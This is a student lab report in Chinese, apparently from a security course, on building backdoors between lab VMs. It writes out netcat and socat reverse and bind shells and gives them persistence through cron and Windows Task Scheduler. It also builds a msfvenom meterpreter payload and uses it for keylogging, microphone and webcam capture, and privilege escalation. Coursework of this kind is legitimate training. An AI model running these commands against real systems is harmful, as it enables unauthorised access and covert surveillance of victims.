Exp2 后门原理与实践 20164309
?
準備工作:
使用 ipconfig 查看win7虛擬機IP地址為:192.168.236.130
使用 ipconfig 查看linux虛擬機IP地址為:192.168.236.131
?
?
實驗內容
?
一、使用nc或netcat遠程獲取shell
(1)win獲得Linux shell
1.windows打開監聽
進入文件夾
cd netcat開始監聽
ncat.exe -l -p 4309這里的 -l 是監聽模式,-p是選擇監聽的端口。
2. Linux反彈連接win
nc 192.168.236.130 4309 -e /bin/sh?
3.windows下獲得一個linux shell,可運行任何cmd指令,如ls
(2) Linux獲得Win Shell
1.Linux運行監聽指令
nc -l -p 4309
2.Windows反彈連接Linux
ncat.exe -e cmd.exe 192.168.236.131 4309?
3.Linux下看到Windows的命令提示
可以發現,linux端獲得了win的shell
?
(3) nc傳輸數據
1.在win端對4309端口進行監聽
ncat.exe -l -p 43092.linux端連接到win端4309端口
nc 192.168.236.130 43093.傳輸通道建立,可以傳輸文字信息了
?
二、使用netcat獲取主機操作Shell,cron啟動
1.在Win端進行監聽
ncat.exe -l -p 4309?2.使用crontab指令增加一條定時任務
crontab-ecrontab指令可以用于設置周期性被執行的指令。該命令從標準輸入設備讀取指令,并將其存放于crontab文件中,以供之后讀取和執行,"-e"表示編輯
3.添加指令令其定時反向連接
在最后添加一條定時連接win端口的指令
56 * * * * /bin/netcat 192.168.236.130 4309 -e /bin/sh表示每小時的第56分鐘連接IP為192.168.236.130的主機(即虛擬機win7端)的4309端口,具體時間可以自行設定,我這里為了方便選擇了兩分鐘之后的時間
稍等片刻,發現成功獲取win端的shell
三、使用socat獲取主機操作Shell, 任務計劃啟動
1.新建一個能運行socat的任務
?①搜索任務計劃程序,點擊進入
?
②點擊右側操作里的創建任務,并命名為“20164309 socat”
③新建觸發器,設定為在鎖定時觸發
?
③新建操作,選定目標程序路徑,并且添加參數:
tcp-listen:4309 exec:cmd.exe,pty,stderr這個命令可以將cmd.exe綁定到4309端口,并且將cmd.exe的stderr重定向到stdout上
?
?我們可以看到,創建任務成功
2.觸發任務,使其運行
使用Windows+l鎖定主機后,再解鎖,發現程序已經運行
3.獲取shell
socat - tcp:192.168.236.130:4309這里的第一個參數-代表標準的輸入輸出,第二個流連接到Windows主機的4309端口。
在實現的時候我出現了一個問題:在tcp后多打了一個空格,卡了很久,不過好在成功了,大家引以為戒。
修改后發現已經成功獲取cmd Shell:
四、使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機并運行獲取主機Shell
1.生成后門
在linux端使用msfvenom工具,生成后門:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.6.194 LPORT=4309 -f exe > 20164309_backdoor.exe 192.168.236.131其中-p 使用的payload,為有效載荷,就是被運輸有東西。這里windows/meterpreter/reverse_tcp就是一段shellcode.LHOST是反彈回連的IP,即攻擊機linux的IP地址,LPORT是回連的端口,-f是生成文件的類型, >輸出到哪個文件
由于一開始沒有充分理解這里的ip地址的意義,我使用了被攻擊win端的地址,導致在之后使用后門的時候屢屢失敗。經過理解我發現這里的ip是被攻擊主機需要連接的地址,即為攻擊機linux端的地址。
2. 使用nc進行文件傳輸
需要在win端關閉殺軟和防火墻的條件下進行
①在win端進行監聽
ncat.exe -lv 4309 > 20164309_backdoor.exe其中-lv表示可以觀察到連接狀態
?
?②在linux端傳輸文件
nc 192.168.236.130 4309 < 20164309_backdoor.exe發送文件在win端命令行顯示傳輸成功
的確傳輸成功了
?3.在msf端控制臺設置反彈回連
輸入
msfconsole進入控制臺(之后由于實驗屢次失敗我進入了這個界面不知道多少次。。。幸虧這里有一個小彩蛋,每次進入的界面大都和之前不一樣,也算是苦中作樂了吧)
use exploit/multi/handler設置payload
set payload windows/meterpreter/reverse_tcp使用生成后門程序時相同的payload
set LHOST 192.168.236.131這里需要與生成后門程序的主機IP相同
set LPORT 4309需要使用相同的端口
show options顯示選項
exploit進行監聽
屢次嘗試,在糾正了剛剛說的那個錯誤后在win端運行了正確的后門
發現可以調用win端shell
五、使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,并嘗試提權
還有很多功能可以使用,我們一個一個試試吧
1.使用screenshot進行截屏,截屏得文件nQebvnBz.jpeg
2.使用keyscan_start指令開始記錄下擊鍵的過程,亂輸一通試試:
成功記錄
3.使用record_mic指令截獲一段音頻,文件名為qbucCKSm.wav
4.或者使用webcam_snap進行拍。。等等,為什么失敗了
發現無法進行拍照,看看排除一下原因,發現:
貌似虛擬機無法調用內置攝像頭
上網查查有什么解決的方法
???現在去買一個外置攝像頭也來不及了,忍痛割愛在自己主機上試試吧。。。
?按部就班地進行試驗:
查得ip地址為:192.168.6.194
傳輸后門
在linux準備就緒后運行后門
發現可以拍照了,那多拍幾張選一張看得出生理特征的(比如眼鏡(???)),就決定是你了:hAcbeMwj,jpeg
?
5.繼續實驗嘗試提權
輸入getuid查看權限分組
輸入getsystem進行提權
發現在提權時遇到了一些問題,無法提權
有可能是win10賬號是管理員權限?那我再在win7虛擬機上嘗試一下普通用戶
還是失敗
再試試win7的管理員賬號
意想不到的是竟然成功了,希望大神們能幫忙解釋一下原理
?
基礎問題解答:
(1)?? 例舉你能想到的一個后門進入到你系統中的可能方式?
記得很久以前的三一五晚會曝光了一些手機APP擅自添加后門,導致巨大的財產損失的案例,那時候智能手機方興未艾,人們的安全意識也相對薄弱,但是現在這樣的事情還真實地發生在我們身邊;還有一些釣魚網站會誘導我們點擊下載一些后門程序,一旦程序運行就成了人為刀俎我為魚肉的情形了。
(2)?? 例舉你知道的后門如何啟動起來(win及linux)的方式?
后門可能會偽裝成正常的程序或軟件,誘導用戶使用,來獲取你的權限。
(3)?? Meterpreter有哪些給你映像深刻的功能?
遠程拍照功能。在之前bm管理概論的課程中我閱讀了《無處可藏》這本書,有一段令我印象深刻的細節是斯諾登筆記本電腦的攝像頭用膠帶封住了,當時我還認為杞人憂天了,但是沒有想到這種技術門檻這么低。
(4)如何發現自己有系統有沒有被安裝后門?
對于我們來說最好的辦法就是經常性的殺毒、及時更新系統、病毒庫以查找后門。在實驗中我還發現在進行遠程照相的時候我攝像頭旁邊的呼吸燈閃了一下,如果現實生活中遇到這種情況務必要注意了
?
實驗心得:
這次實驗最大的收獲就是明白了細節決定成敗。由于自己的粗心馬虎,這次實驗幾乎花了我兩個晚上才完成,每一步都要遇到一些或多或少地小問題。甚至一開始為了不注冊碼云賬號沒有使用老師的ncet而去網上下載了一個,導致在傳輸文件的時候出現問題;還有輸入socat命令的時候多打了一個空格,也導致無法順利調用shell;甚至在寫實驗報告的時候發現缺少關鍵的截圖而回過頭來臨時做臨時截的。在今后的實驗和學習乃至工作中,我一定要戒驕戒躁,時刻關注細節,才能高質量地完成任務。
?
轉載于:https://www.cnblogs.com/20164309-kx/p/10577470.html
總結
以上是生活随笔為你收集整理的Exp2 后门原理与实践 20164309的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Exp1 PC平台逆向破解 201643
- 下一篇: Exp3 免杀原理与实践 201643